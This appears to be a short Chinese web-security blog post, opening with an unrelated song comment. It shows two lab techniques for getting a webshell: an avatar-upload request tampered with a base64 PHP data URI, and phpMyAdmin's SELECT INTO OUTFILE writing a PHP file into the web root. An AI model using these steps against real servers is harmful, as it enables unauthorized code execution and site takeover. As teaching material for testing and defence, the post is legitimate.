畢業時,門衛大爺收走了那輛自行車,問我都那麼破了,還拍照幹什麼,他哪裡知道後座上曾坐過陪了我四年的姑娘。。。
---- 網易雲熱評
一、任意上傳文件拿shell
1、註冊賬號
2、上傳頭像
3、上傳任意文件,抓包分析
將tx後面的內容修改為tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D
解密收的內容為:data:image/php;base64,,也就是上傳一個文件內容為的php文件
4、雖然提示報錯,但是我們訪問上傳後的地址: http://192.168.171.128/uploadfile/member/3/0x0.php ,文件已生效
二、sql命令拿shell
1、進入phpmyadmin頁面
2、輸入一下sql語句並執行,生成一aiyou.php文件,內容為
select "" into outfile "C:/phpStudy/PHPTutorial/WWW/aiyou.php"
3、訪問該文件 http://192.168.171.128/aiyou.php
禁止非法,後果自負
分享到:
閱讀更多 web安全工具庫 的文章
